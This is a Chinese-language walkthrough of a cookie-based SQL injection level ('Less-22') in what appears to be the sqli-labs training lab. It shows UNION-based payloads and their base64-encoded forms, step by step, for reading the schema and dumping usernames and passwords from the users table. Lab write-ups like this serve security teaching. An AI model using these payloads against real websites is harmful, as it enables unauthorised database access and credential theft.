Less-22
正常登陆:
查看一下cookie:
利用解密工具破解,value为admin,因此该关卡与less-21类似,我们知道加密解密方式后开始判断注入点:
更改cookie为admin”,返回错误:
更改为admin”#,返回正常,说明闭合方式为””,现在可以开始注入。
获取当前数据库:
" union select 1,2,database()#加密后得到:
IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
获取security库中的表:
" union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)#加密后得到:
IiB1bmlvbiBzZWxlY3QgMSwyLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5Jykj
获取users表中的字段:
" union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)#加密后得到:
IiB1bmlvbiBzZWxlY3QgMSwyLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSd1c2VycycpIw==
获取username和password:
" union select 1,2,(select group_concat(concat_ws(username,0x7e,password)) from security.users)#加密后得到:
IiB1bmlvbiBzZWxlY3QgMSwyLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbmNhdF93cyh1c2VybmFtZSwweDdlLHBhc3N3b3JkKSkgZnJvbSBzZWN1cml0eS51c2Vycykj